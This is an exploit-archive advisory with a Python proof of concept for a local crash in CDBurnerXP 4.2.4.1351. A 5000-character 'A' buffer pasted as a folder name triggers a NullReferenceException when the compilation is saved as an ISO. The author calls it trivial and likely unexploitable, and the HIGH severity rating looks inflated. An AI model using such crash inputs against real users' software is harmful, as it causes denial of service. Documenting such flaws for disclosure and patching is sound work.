Vendor: CDBurnerXP
By: Dr_IDE
CVSS: 7.8 HIGH
CWE: 476, Null Reference Exception
Product Name: CDBurnerXP
Affected Version From: 4.2.4.1351
Affected Version To: 4.2.4.1351
Patch Exists: NO
Related CWE: N/A
CPE: a:cdburnerxp:cdburnerxp:4.2.4.1351
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3, Windows 7 RC
2009

CDBurnerXP v 4.2.4.1351 Local Crash PoC

CDBurnerXP v 4.2.4.1351 is vulnerable to a local crash due to a Null Reference Exception. This vulnerability can be triggered by creating a new data disc, adding a folder, pasting to rename the folder, and clicking 'Save Compilation as ISO'. The crash occurs due to a lack of proper input validation when handling user-supplied data.

Mitigation:

Input validation should be implemented to ensure that user-supplied data is properly sanitized.

Exploit-DB raw data:

#!/usr/bin/env python

####################################################################################
#
# CDBurnerXP v 4.2.4.1351 Local Crash PoC
# Found By:	Dr_IDE
# Tested On:	XPSP3, 7RC
# Usage:	Create New Data Disc, Add a Folder, Paste to Rename Folder, Click Save Compilation as ISO
# Notes:	Super lame and most likely not exploitable.
#
####################################################################################

'''
Error Message:
System.NullReferenceException: Object reference not set to an instance of an object.
   at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)
   at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender, EventArgs e)
   at System.Windows.Forms.MenuItem.OnClick(EventArgs e)
   at System.Windows.Forms.MenuItem.MenuItemData.Execute()
   at System.Windows.Forms.Command.Invoke()
   at System.Windows.Forms.Command.DispatchID(Int32 id)
   at System.Windows.Forms.Control.WmCommand(Message& m)
   at System.Windows.Forms.Control.WndProc(Message& m)
   at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
   at System.Windows.Forms.ContainerControl.WndProc(Message& m)
   at System.Windows.Forms.Form.WndProc(Message& m)
   at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)
   at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
   at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
'''

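# Build a 5000-character buffer of "A" (0x41).
buff = "\x41" * 5000

# Write the buffer to cdburnerxp.txt; the context manager closes the file.
with open("cdburnerxp.txt", "w") as f1:
    f1.write(buff)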